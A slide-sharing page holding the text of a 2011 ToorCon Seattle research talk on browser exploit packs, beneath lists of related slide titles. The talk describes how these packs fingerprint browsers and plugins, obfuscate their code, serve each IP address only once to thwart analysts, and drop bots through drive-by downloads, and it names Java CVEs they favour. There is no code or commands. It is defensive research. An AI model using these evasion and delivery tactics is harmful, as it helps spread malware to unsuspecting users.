CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...Aditya K Sood
 
ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis PaperAditya K Sood
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Aditya K Sood
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareAditya K Sood
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareAditya K Sood
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware TaxonomyAditya K Sood
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingAditya K Sood
 
Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Aditya K Sood
 
VxWorks - Holistic Security (Art of Testing)
VxWorks - Holistic Security (Art of Testing)VxWorks - Holistic Security (Art of Testing)
VxWorks - Holistic Security (Art of Testing)Aditya K Sood
 
Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011Aditya K Sood
 

Más de Aditya K Sood (20)

Emerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareEmerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks Malware
 
Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB Instances
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in Elasticsearch
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
 
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
 
Abusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAbusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and Defences
 
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
 
ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android Infections
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis Paper
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks Malware
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web Malware
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware Taxonomy
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile Hacking
 
Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing
 
VxWorks - Holistic Security (Art of Testing)
VxWorks - Holistic Security (Art of Testing)VxWorks - Holistic Security (Art of Testing)
VxWorks - Holistic Security (Art of Testing)
 
Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011
 

Último

My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 

Último (20)

My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 

Toorcon Seattle 2011 - Browser Exploit Packs

  • 1. Browser Exploit Packs Exploitation Tactics ToorCon Security Conference SEATTLE , 2011 Aditya K Sood | Richard J Enbody SecNiche Security | Department of Computer Science and Engineering Michigan State University
  • 2. About Us  Aditya K Sood ─ Founder , SecNiche Security ● Independent Security Consultant, Researcher and Practitioner ● Worked previously for Armorize, Coseinc and KPMG ● Active Speaker at Security conferences ● Written Content – ISSA/ISACA/CrossTalk/HITB/Hakin9/Elsevier NES|CFS ● LinkedIn : http://www.linkedin.com/in/adityaks ● Website: http://www.secniche.org | Blog: http://secniche.blogspot.com ─ PhD Candidate at Michigan State University  Dr. Richard J Enbody ─ Associate Professor, CSE, Michigan State University ● Since 1987, teaching computer architecture/ computer security / mathematics ● Website: http://www.cse.msu.edu/~enbody ─ Co-Author CS1 Python book, The Practice of Computing using Python. ─ Patents Pending – Hardware Buffer Overflow Protection 2
  • 3. Agenda  BEP Generic Framework ─ BEP Insidious Details  BEP Trades and Tactics ● Plugin Detection and Verification ● String Obfuscation, Replacement and Manipulation ● User Agent Based Fingerprinting ● IP Logging Detection Trick ● Drive By Downloads ● Drive By Cache ● BEP’s and Botnets Collaboration  Future Work and Discussion 3
  • 4. BEP Generic Framework  BEP Framework ─ Detecting Patterns ● Fingerprinting the victim environment ● Applying inherent techniques supporting exploitation ● Robust approach to set the ground before serving exploits ─ Supporting Objects ● JavaScript event handlers ● Document Object Model (DOM) objects ● Dynamic content generation ● Requests across domains ─ Exploit Trigger ● Serving exploits efficiently ● Dropping malicious executable or bot in the victim machine 4
  • 5. BEP Configuration Check  BEP Framework ─ Configuration (Admin Panel + Execution Environment) ● Payload determines the malicious executable to be dropped – BEP’s are a supporting agent for botnets. Ofcourse, bots are dropped. ● Apart from normal settings, exploit distribution environment is set. 5
  • 6. PHP Ion Cube Encoder  PHP Ion Cube Encoder ─ Why ? ● Most of the BEPs are designed in PHP. ● Encodes all the exploits in a robust manner (efficient code protection) – All PHP files in BEP’s are encoded except configuration file – No restoration of compiled files back to source level. » Protection is applied at compilation time – Encoded files have digital signatures. – MAC protection enabled. Encoding Layer {n} ● Exploit detection becomes hard Encoding Layer { … } Encoding Layer {2} Encoding Layer {1} Optimized compiled Byte codes 6
  • 7. Max Mind Geo Location Library  Tracking and Tracing ─ Open source library for statistical analysis ● Most of BEP’s and botnets explicit use this library ● However, it is not a hard restriction to use this library – Malware writers can also use custom designed tracking code – An inadvertent part of any BEP 7
  • 9. Plugin Detection and Verification  Plugin Verification and Version Detection ─ Plugin Detection ! Why? ● Enumerating the installed plugins in browsers. ● Serving exploits based on installed version of various plugins – Generic PluginDetect.js script is used to attain the information ─ Example: Phoenix Browser Exploit Pack ● GetJavaInfo.jar – Decompilation provides the generic code of detecting installed java version – Used to verify the appropriate exploit match 9
  • 10. String Encoding and Replacement  Encoding Tactics ─ String manipulation ● Defining variables to obfuscate the reality » Declaring the strings in reverse order during execution » Passing the required string to definitive string replacement class » Randomizing the BEP file names 10
  • 11. String Tampering - Example 11
  • 12. User Agent Based Fingerprinting 12
  • 13. IP Logging Detection Trick (IPLDT)  What it is all about? ─ Hampering the analysis process – Exploit is served only once a time to the required IP – BEP uses GeoLocation PHP library to keep a track of IP addresses – Appropriate check is performed before serving exploit » If IP is already served no more exploits are delivered » In other terms, no more infection to the specific IP address 13
  • 14. Long Live – Drive By Downloads  Inside Drive By Downloads – Serving malware by forcing users to visit infected website – Iframe is injected into vulnerable websites – Exploit is served silently based on browser environment 14
  • 15. Long Live – Drive By Downloads  Complete Process – Victim browser is forced to visit infected website – Iframe redirects browser to the EXPLOIT POINT (Exploit Hub) – Exploit is served by fingerprinting browser environment – Browser is exploited successfully – Exploit point silently asks for the malware from the malicious domain » It can be self driven – Malware is downloaded into system and automatically installed 15
  • 16. Wait ! Drive By Cache. What?  What it is ? – Brother of Drive by Download Attacks. Is it ? – More efficient way to bypass anti virus protections .  Comparison – Drive By Download / Drive By Cache – Very less variations have been noticed ( Drive By Cache) – However, the infections are still in the wild and some of the traces have been noticed – Lot more to research over this attack but it has been initialized already – Reference: http://blog.armorize.com/2011/04/newest-adobe-flash-0-day-used-in- new.html 16
  • 17. BEP’s & Botnets Collaboration  Is This True Artifact? ─ Yes it is. – BEP’s are used in conjunction with botnets – On successful exploitation, bot is dropped into victim machine – Harnessing the power of two different frameworks to deliver malware – Some traces have been seen of ZEUS (Botnet) + BlackHole (BEP) 17
  • 18. Top 5 Java Exploits – BEP Choice  Finest and Fast Five Java Exploits ─ High exploitation and infection Rate – Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (CVE-2010-0840) – Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability (CVE-2010-0842) | Java JMF MIDI – Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE (CVE-2010-0886) – Sun Java Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability (CVE-2010-0094) | Java RMI – Java argument injection vulnerability in the URI handler in Java NPAPI plugin (CVE-2010-1423) 18
  • 19. Future Work and Discussion  Hunting back the malware domains like a hacker  Continuous analysis to dig deeper into malware world  Designing solutions and protection mechanisms  Researching new and advanced hacking techniques  Becoming smarter with the passage of time 19
  • 20. Questions / Thanks  Thanks to ToorCon (http://www.toorcon.org)  Thanks to SecNiche Security(http://www.secniche.org )  Malware at Stake ( http://secniche.blogspot.com ) 20